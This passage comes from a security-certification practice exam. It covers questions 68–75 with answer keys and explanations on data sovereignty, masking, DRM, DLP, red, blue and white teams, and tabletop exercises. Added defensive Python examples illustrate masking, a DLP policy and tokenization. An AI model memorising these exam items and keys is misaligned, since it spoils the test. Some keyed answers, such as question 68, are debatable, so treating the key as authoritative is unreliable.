General Data Protection Regulation is incorrect. The General Data Protection Regulation (GDPR) is a set of rules designed to give EU citizens more control over their personal data. It aims to simplify the regulatory environment for business so both citizens and businesses in the European Union can fully benefit from the digital economy.

Under the terms of GDPR, not only do organizations have to ensure that personal data is gathered legally and under strict conditions, but those who collect and manage it are obliged to protect it from misuse and exploitation, as well as to respect the rights of data owners, or face penalties for not doing so.

National Institute of Standards and Technology is incorrect. The National Institute of Standards and Technology's (NIST) mission is to promote U.S. innovation and industrial competitiveness by advancing measurement science, standards, and technology in ways that enhance economic security and improve the quality of life.

International Organization for Standardization is incorrect. The International Organization for Standardization (ISO) develops and publishes standards for a vast range of products, materials, and processes. The organization's standards catalog is divided into 97 fields which include healthcare technology, railway engineering, jewelry, clothing, metallurgy, weapons, paint, civil engineering, agriculture, and aircraft.

Question 68. A company collects information from customers in all possible ways through the web. Afterwards, the company separates the information based on demographics and interests and resells the customers' data to third-party companies in different countries. Which of the following concepts does the company violate?
(A) Data masking
(B) Data enrichment
(C) Data sovereignty
(D) Data exfiltration

Explanation 68. Data sovereignty is the correct answer. Data sovereignty is the concept that information that has been converted and stored in binary digital form is subject to the laws of the country in which it is located.

Data sovereignty comes into play when an organization's data is stored outside of its country and is subject to the laws of the country in which the data resides. The main concern with data sovereignty is maintaining privacy regulations and keeping foreign countries from being able to subpoena data.

Data masking is incorrect. Data masking is a method of creating a structurally similar but inauthentic version of an organization's data that can be used for purposes such as software testing and user training. The purpose is to protect the actual data while having a functional substitute for occasions when the real data is not required.

Overall, the primary function of masking data is to protect sensitive, private information in situations where it might be visible to someone without clearance to the information.

Data enrichment is incorrect. Data enrichment is the process of combining first-party data from internal sources with disparate data from other internal systems or third-party data from external sources. Enriched data is a valuable asset for any organization because it becomes more useful and insightful.

Data exfiltration is incorrect. Data exfiltration is a form of security breach that occurs when an individual's or company's data is copied, transferred, or retrieved from a computer or server without authorization.

Question 69. Your organization is working with a contractor to build a database. You need to find a way to hide the actual data from being exposed to the contractor. Which of the following techniques will you use in order to allow the contractor to test the database environment without having access to actual sensitive customer information?
(A) Data masking
(B) Tokenization
(C) Encryption
(D) Data at rest

Explanation 69. Data masking is the correct answer. Data masking is a method of creating a structurally similar but inauthentic version of an organization’s data that can be used for purposes such as software testing and user training. The purpose is to protect the actual data while having a functional substitute for occasions when the real data is not required.

Overall, the primary function of masking data is to protect sensitive, private information in situations where it might be visible to someone without clearance to the information.
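As an added illustration of the "structurally similar but inauthentic" idea that both this explanation and the data masking entry of the previous question describe, the following Python example is not part of the original practice test. It masks a constructed customer row for hand-over to a contractor: names, phone numbers and IDs keep their shape, e-mail addresses move to the reserved example.com domain, and card numbers are regenerated so they still pass the Luhn check that a test database would apply. The masking secret and the sample record are assumptions made up for the example.

```python
import hashlib
import hmac
import random
import string

# Assumption: a per-environment masking secret held only by the masking job. It is not
# derived from the real data, so the contractor cannot map masked values back.
MASK_SECRET = b"constructed-masking-secret-rotate-me"


def _rng_for(value: str) -> random.Random:
    """Seed a PRNG from HMAC(secret, value): the same real value always masks to the
    same fake value, so joins between masked tables keep working."""
    seed = hmac.new(MASK_SECRET, value.encode("utf-8"), hashlib.sha256).digest()
    return random.Random(seed)


def mask_shape(value: str) -> str:
    """Keep the structure (length, punctuation, letter/digit positions), replace the content."""
    rng = _rng_for(value)
    out = []
    for ch in value:
        if ch.isdigit():
            out.append(rng.choice(string.digits))
        elif ch.isupper():
            out.append(rng.choice(string.ascii_uppercase))
        elif ch.islower():
            out.append(rng.choice(string.ascii_lowercase))
        else:
            out.append(ch)  # separators, spaces and symbols stay where they are
    return "".join(out)


def luhn_check_digit(body: str) -> str:
    """Check digit that makes body + digit pass the Luhn test used for card numbers."""
    total = 0
    for i, ch in enumerate(reversed(body)):
        d = int(ch)
        if i % 2 == 0:  # rightmost body digit is doubled once the check digit is appended
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return str((10 - total % 10) % 10)


def luhn_valid(number: str) -> bool:
    """Standard Luhn validation, as an application's input check would run it."""
    total = 0
    for i, ch in enumerate(reversed(number)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def mask_card(pan: str) -> str:
    """Fake card number of the same length that still passes Luhn validation, so test
    cases that exercise payment code run unchanged against the masked data."""
    digits = "".join(c for c in pan if c.isdigit())
    rng = _rng_for(digits)
    body = "".join(rng.choice(string.digits) for _ in digits[:-1])
    return body + luhn_check_digit(body)


def mask_email(email: str) -> str:
    """Masked local part plus the RFC 2606 reserved domain, so no masked address reaches a real mailbox."""
    local, _, _domain = email.partition("@")
    return mask_shape(local) + "@example.com"


def mask_record(record: dict) -> dict:
    """Mask one customer row. The surrogate key is left intact: it carries no personal
    data and foreign keys elsewhere in the test database must still resolve."""
    return {
        "customer_id": record["customer_id"],
        "name": mask_shape(record["name"]),
        "email": mask_email(record["email"]),
        "phone": mask_shape(record["phone"]),
        "card": mask_card(record["card"]),
    }


# Constructed sample row (not real customer data)
SAMPLE = {
    "customer_id": 1042,
    "name": "Alice Smith",
    "email": "alice.smith@corp-internal.example",
    "phone": "+1 415-555-0123",
    "card": "4111111111111111",
}

if __name__ == "__main__":
    print(mask_record(SAMPLE))
```

Two design points matter in practice: masking is keyed per value so that referential integrity across tables survives, and the output deliberately keeps format validity so the contractor's test suite exercises the same code paths as production without ever seeing production values.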

Tokenization is incorrect. Tokenization is the process of turn-
ing a meaningful piece of data, such as an account number,
into a random string of characters called a token that has no
meaningful value if breached. Tokens serve as a reference to
the original data, but cannot be used to guess those values.
That’s because, unlike encryption, tokenization does not use a
mathematical process to transform sensitive information into
the token.

There is no key or algorithm that can be used to derive the original data for a token. Instead, tokenization uses a database, called a token vault, which stores the relationship between the sensitive value and the token. The real data in the vault is then secured, often via encryption.

Encryption is incorrect. Encryption is the process of using an algorithm to transform plain text information into a non-readable form called ciphertext. An algorithm and an encryption key are required to decrypt the information and return it to its original plain text format. Today, SSL encryption is commonly used to protect information as it’s transmitted on the Internet.

Data at rest is incorrect. Data at rest is data that is not actively moving from device to device or network to network such as data stored on a hard drive, laptop, flash drive, or archived/stored in some other way. Data protection at rest aims to secure inactive data stored on any device or network. While data at rest is sometimes considered to be less vulnerable than data in transit, attackers often find data at rest a more valuable target than data in motion.

Question 70. An author just published his new eBook on Amazon but he worries about copyright issues as the previous eBook was found on file-sharing websites. The author wants to prevent users from sharing his content online. Which of the following tools allows the author to prevent unauthorized use of his content?
(A) NDA
(B) DRM
(C) DLP
(D) AUP

Explanation 70. DRM is the correct answer. Digital rights management (DRM) is a way to protect copyrights for digital media. This approach includes the use of technologies that limit the copying and use of copyrighted works and proprietary software. In a way, digital rights management allows publishers or authors to control what paying users can do with their works.

Publishers, authors, and other content creators use an applica-
tion that encrypts media, data, e-book, content, software, or
any other copyrighted material. Only those with the decryption
keys can access the material. They can also use tools to limit or
restrict what users are able to do with their materials.

There are many ways to protect your content, software, or product. DRM allows you to:
- Restrict or prevent users from editing or saving your content.
- Restrict or prevent users from sharing or forwarding your product or content.
- Restrict or prevent users from printing your content. For some, the document or artwork may only be printed up to a limited number of times.

NDA is incorrect. A Non-Disclosure Agreement (NDA) is a legally enforceable contract that establishes confidentiality between two parties—the owner of protected information and the recipient of that information. By signing an NDA, participants agree to protect confidential information shared with them by the other party.

DLP is incorrect. Data Loss Prevention (DLP) makes sure that users do not send sensitive or critical information outside the corporate network. The term describes software products that help a network administrator control the data that users can transfer.

AUP is incorrect. An acceptable use policy (AUP), acceptable usage policy, or fair use policy, is a set of rules applied by the owner, creator, or administrator of a network, website, or service, that restrict the ways in which the network, website or system may be used and sets guidelines as to how it should be used.

Question 71. A company hired an outside contractor to oversee the cyber defense competition and adjudicate the event. Which of the following cybersecurity testing exercise teams has MOST likely been hired?
(A) Red team
(B) Blue team
(C) White team
(D) Purple team

Explanation 71. White team is the correct answer. The White Team oversees the cyber defense competition and adjudicates the event. They are also responsible for recording scores for the Blue Teams given by the Red Team on usability and security, respectively. The White Team also reads the security reports and scores them for accuracy and countermeasures.

Red team is incorrect. Red Teams are the attackers. While not
strictly required, Red Teams are usually outside contractors –
since the best testing is done by a team with a lot of knowledge
of how to break in, but no knowledge of what security is already
in place. Knowing what security is being used can lead to some
attacks being automatically avoided because there is security
in place – which can lead to vulnerabilities being missed if that
security isn’t properly configured.

Blue team is incorrect. Blue teams are the defenders. Blue Teams have two major areas of operations. They continually attempt to harden security around and within the company’s data systems and networks – even when no testing is going on. They can also act as an active part of the defensive systems when the Red Team is attacking.

Purple Team is incorrect. Purple Teams are a single group of people who do both Red and Blue testing and securing of a company. They may be a consulting group brought in for an audit, or employees of the company directly, but they do not focus exclusively on attacking or defending – they do both. Purple Teams are effective for spot-checking systems in larger organizations as well, but it is generally best to have opposing and independent teams whenever possible.

Question 72. You have been hired as a penetration tester for conducting an assessment. The company wants to include ONLY cross-site scripting and SQL injection from the list of authorized activities. Which of the following documents would include this limitation?
(A) Non-Disclosure Agreement
(B) Code of Conduct
(C) Rules of Engagement
(D) Acceptable Use Policy

Explanation 72. Rules of Engagement is the correct answer. The Rules of Engagement, or ROE, are meant to list out the specifics of your penetration testing project to ensure that both the client and the engineers working on a project know exactly what is being tested, when it’s being tested, and how it’s being tested.

Non-Disclosure Agreement (NDA) is incorrect. A Non-Disclosure Agreement (NDA) is a legally enforceable contract that establishes confidentiality between two parties—the owner of protected information and the recipient of that information. By signing an NDA, participants agree to protect confidential information shared with them by the other party.

Code of Conduct is incorrect. A code of conduct defines how a company’s employees should act on a day-to-day basis. It reflects the organization’s daily operations, core values, and overall company culture. As a result, every code of conduct is unique to the organization it represents.

Acceptable Use Policy is incorrect. An acceptable use policy (AUP), acceptable usage policy, or fair use policy, is a set of rules applied by the owner, creator, or administrator of a network, website, or service, that restrict the ways in which the network, website or system may be used and sets guidelines as to how it should be used.

Question 73. If an employee tried to forward a business email outside the corporate domain or upload a corporate file to a consumer cloud storage service like Google Drive, the employee would be denied permission. Which of the following processes is described in the above scenario?
(A) Non-disclosure Agreement
(B) Data Loss Prevention
(C) Digital Rights Management
(D) Tokenization

Explanation 73. Data Loss Prevention (DLP) is the correct answer. Data Loss Prevention (DLP) makes sure that users do not send sensitive or critical information outside the corporate network. The term describes software products that help a network administrator control the data that users can transfer.

DLP products use business rules to classify and protect confidential and critical information so that unauthorized users cannot accidentally or maliciously share data, which would put the organization at risk.
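To show what "business rules to classify and protect" looks like in code, here is an added Python example that is not part of the original practice test. It models the two scenarios from the question (an e-mail forwarded outside the corporate domain and a file uploaded to a consumer cloud service) as transfers evaluated by a small policy engine: content is classified first, and only confidential content crossing the corporate boundary is denied. The corporate domain, the host lists, the classification patterns and the sample transfers are assumptions constructed for the example.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# Assumptions for this constructed example: the corporate mail domain, the consumer
# storage services the policy blocks, and the one corporate file service it allows.
CORPORATE_DOMAIN = "corp.example"
CONSUMER_CLOUD_HOSTS = {"drive.google.com", "www.dropbox.com", "onedrive.live.com"}
SANCTIONED_UPLOAD_HOSTS = {"files.corp.example"}

# Content rules: an explicit classification label, or a pattern that marks regulated data.
LABEL_RE = re.compile(r"\b(CONFIDENTIAL|INTERNAL ONLY|RESTRICTED)\b", re.IGNORECASE)
SSN_RE = re.compile(r"\b\d{3}-\d{2}-\d{4}\b")  # US SSN-shaped values (sample data is constructed)


@dataclass
class Transfer:
    channel: str      # "email" or "upload"
    user: str
    destination: str  # recipient address for email, host name for uploads
    content: str      # message body or file text as seen by the DLP agent


def classify(content: str) -> str:
    """Business-rule classification: labelled or regulated content is 'confidential', else 'public'."""
    if LABEL_RE.search(content) or SSN_RE.search(content):
        return "confidential"
    return "public"


def evaluate(t: Transfer) -> Tuple[str, str]:
    """Return (decision, reason). Only confidential content leaving the corporate boundary is denied."""
    label = classify(t.content)
    if label == "public":
        return ("allow", "no sensitive content detected")
    if t.channel == "email":
        domain = t.destination.rsplit("@", 1)[-1].lower()
        if domain != CORPORATE_DOMAIN:
            return ("deny", f"confidential mail to external domain {domain}")
        return ("allow", "confidential mail stays inside the corporate domain")
    if t.channel == "upload":
        host = t.destination.lower()
        if host in CONSUMER_CLOUD_HOSTS:
            return ("deny", f"confidential upload to consumer cloud {host}")
        if host not in SANCTIONED_UPLOAD_HOSTS:
            return ("deny", f"confidential upload to unsanctioned host {host}")
        return ("allow", "confidential upload to sanctioned corporate storage")
    return ("deny", f"unknown channel {t.channel}")  # fail closed on anything the policy does not model


# Constructed transfers: the question's two scenarios plus two that the policy permits.
SAMPLE_TRANSFERS = [
    Transfer("email", "bob@corp.example", "bob.personal@mailhost.example",
             "CONFIDENTIAL - Q3 acquisition target list attached"),
    Transfer("upload", "bob@corp.example", "drive.google.com",
             "customer export: 123-45-6789, 987-65-4321"),
    Transfer("email", "bob@corp.example", "alice@corp.example",
             "CONFIDENTIAL - draft for internal review"),
    Transfer("upload", "bob@corp.example", "www.dropbox.com",
             "team lunch menu for Friday"),
]


def run_policy(transfers: List[Transfer]) -> List[str]:
    """Decisions in input order; a real agent would also write each denial to the audit log."""
    return [evaluate(t)[0] for t in transfers]


if __name__ == "__main__":
    for t in SAMPLE_TRANSFERS:
        decision, reason = evaluate(t)
        print(f"{decision.upper():5} {t.channel:6} -> {t.destination}: {reason}")
```

The ordering is deliberate: classification runs before any destination check, so a public lunch menu going to Dropbox is allowed while the same upload carrying SSN-shaped values is blocked, and any channel the policy does not understand is denied rather than silently permitted.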

Non-Disclosure Agreement (NDA) is incorrect. A Non-Disclosure Agreement (NDA) is a legally enforceable contract that establishes confidentiality between two parties—the owner of protected information and the recipient of that information. By signing an NDA, participants agree to protect confidential information shared with them by the other party.

Digital Rights Management (DRM) is incorrect. Digital Rights Management (DRM) is a systematic approach to copyright protection for digital media. The purpose of DRM is to prevent unauthorized redistribution of digital media and restrict the ways consumers can copy content they’ve purchased.

Tokenization is incorrect. Tokenization is the process of turning a meaningful piece of data, such as an account number, into a random string of characters called a token that has no meaningful value if breached. Tokens serve as a reference to the original data, but cannot be used to guess those values. That’s because, unlike encryption, tokenization does not use a mathematical process to transform sensitive information into the token.

There is no key or algorithm that can be used to derive the original data for a token. Instead, tokenization uses a database, called a token vault, which stores the relationship between the sensitive value and the token. The real data in the vault is then secured, often via encryption.
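The token vault described here and in the tokenization entry of question 69 can be demonstrated in a few dozen lines. The Python example below is added for illustration and is not part of the original practice test: tokens are drawn from a CSPRNG in the shape of an account number, the only link between token and value is the vault's lookup table, and a second vault (standing in for anyone who obtains only the tokens) recovers nothing. The sample account numbers are constructed, and the in-memory vault leaves encryption of its stored values, which the explanation mentions, to a real deployment.

```python
import secrets
import string
from typing import Dict, Optional


class TokenVault:
    """Constructed token vault: the only place where a token and its sensitive value are linked.
    In production the vault's contents are encrypted at rest and access to it is tightly
    controlled; this in-memory version concentrates on the tokenization logic itself."""

    def __init__(self) -> None:
        self._token_to_value: Dict[str, str] = {}
        self._value_to_token: Dict[str, str] = {}  # the same value always gets its existing token

    @staticmethod
    def _random_token(value: str) -> str:
        # Same length and all digits, so downstream systems that expect an account-number
        # shape accept it, but every digit comes from a CSPRNG: nothing about the token is
        # computed from the value, so no key or algorithm turns the token back into the value.
        return "".join(secrets.choice(string.digits) for _ in value)

    def tokenize(self, value: str) -> str:
        if value in self._value_to_token:
            return self._value_to_token[value]
        while True:
            token = self._random_token(value)
            # Reject the (astronomically unlikely) collision with an existing token or the value itself.
            if token not in self._token_to_value and token != value:
                break
        self._token_to_value[token] = value
        self._value_to_token[value] = token
        return token

    def detokenize(self, token: str) -> Optional[str]:
        """A lookup, not a computation: without this vault the token is just a random string."""
        return self._token_to_value.get(token)

    def __len__(self) -> int:
        return len(self._token_to_value)


# Constructed sample values (not real account numbers); the repeat shows token reuse.
SAMPLE_ACCOUNTS = ["4111111111111111", "5555555555554444", "4111111111111111"]


def demo(accounts=SAMPLE_ACCOUNTS):
    """Tokenize the samples, then try to reverse the tokens with and without the vault."""
    vault = TokenVault()
    tokens = [vault.tokenize(a) for a in accounts]
    stranger = TokenVault()  # anyone holding only the token stream
    recovered_here = [vault.detokenize(t) for t in tokens]
    recovered_elsewhere = [stranger.detokenize(t) for t in tokens]
    return tokens, recovered_here, recovered_elsewhere


if __name__ == "__main__":
    tokens, here, elsewhere = demo()
    for acct, tok in zip(SAMPLE_ACCOUNTS, tokens):
        print(f"{acct} -> {tok}")
    print("vault lookup:", here)
    print("outside vault:", elsewhere)
```

The contrast with encryption is the point: an encrypted value can be reversed by anyone who obtains the key, whereas a token can only be reversed by querying the vault, which is why the vault itself becomes the asset to harden, monitor and back up.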

Question 74. Your agency has received various complaints
about slow Internet access and that your web site is inaccessi-
ble. After further investigation, it is determined that your agency
is a victim of a DNS amplification attack that is currently over-
whelming your DNS server and network bandwidth. An over-
whelmingly large number of Internet spoofed IP addresses are
involved in the attack. The above scenario can be considered a
tabletop exercise. (TRUE/FALSE)
(A) TRUE
(B) FALSE

Explanation 74. The correct answer is TRUE. Training is a critical step in being prepared to respond to real cybersecurity incidents. A quick and easy way to help prepare your team is to hold short 15-minute tabletop exercises every month.

The goal of the tabletop exercise is to increase security situational awareness and to facilitate discussion of incident response in as simple a manner as possible, targeting a time range of 15 minutes. The exercises provide an opportunity for management to present realistic scenarios to a workgroup for the development of response processes.

Question 75. Which of the following statements describes the
difference between the Red team and the Blue team in a cyber-
security testing exercise?
(A) A blue team imitates an attacker and attacks with char-
acteristic tactics and techniques while a red team is there to
find ways to defend the attack
(B) A red team imitates an attacker and attacks with charac-
teristic tactics and techniques while a blue team is there to find
ways to both defend and attack
(C) A red team imitates an attacker and attacks with charac-
teristic tactics and techniques while a blue team is there to find
ways to defend the attack
(D) A blue team imitates an attacker and attacks with char-
acteristic tactics and techniques while a red team is there to
find ways to both defend and attack

Explanation 75. A red team imitates an attacker and attacks with characteristic tactics and techniques while a blue team is there to find ways to defend the attack is the correct answer.

A red team consists of security professionals who act as adversaries to overcome cybersecurity controls. Red teams often consist of independent ethical hackers who evaluate system security in an objective manner. They utilize all the available techniques (discussed below) to find weaknesses in people, processes, and technology to gain unauthorized access to assets.

A blue team consists of security professionals who have an inside out view of the organization. Their task is to protect the organization’s critical assets against any kind of threat. They are well aware of the business objectives and the organization’s security strategy. Therefore, their task is to strengthen the castle walls so no intruder can compromise the defenses.

THE END

Enrich your online experience with ExamsDigest.
Your purchase of this product includes free access to all 100+
practice questions online and much more at examsdigest.com.
You will have access for one (1) month. You may also access
our full library of Practice exams and share with other learners.
Send us an email to [email protected] now and start your
online practice experience!

ExamsDigest includes:
✓ Access to 3000+ Questions
✓ Access to 300+ Quizzes
✓ 13+ Certification Paths
✓ 24/7 Support
✓ Interactive Interview Questions
✓ Access on the go

About ExamsDigest.
ExamsDigest is a global, education tech-oriented company that
doesn’t sleep. Their mission is to be a part of your life transfor-
mation by providing you the necessary training to hit your ca-
reer goals.
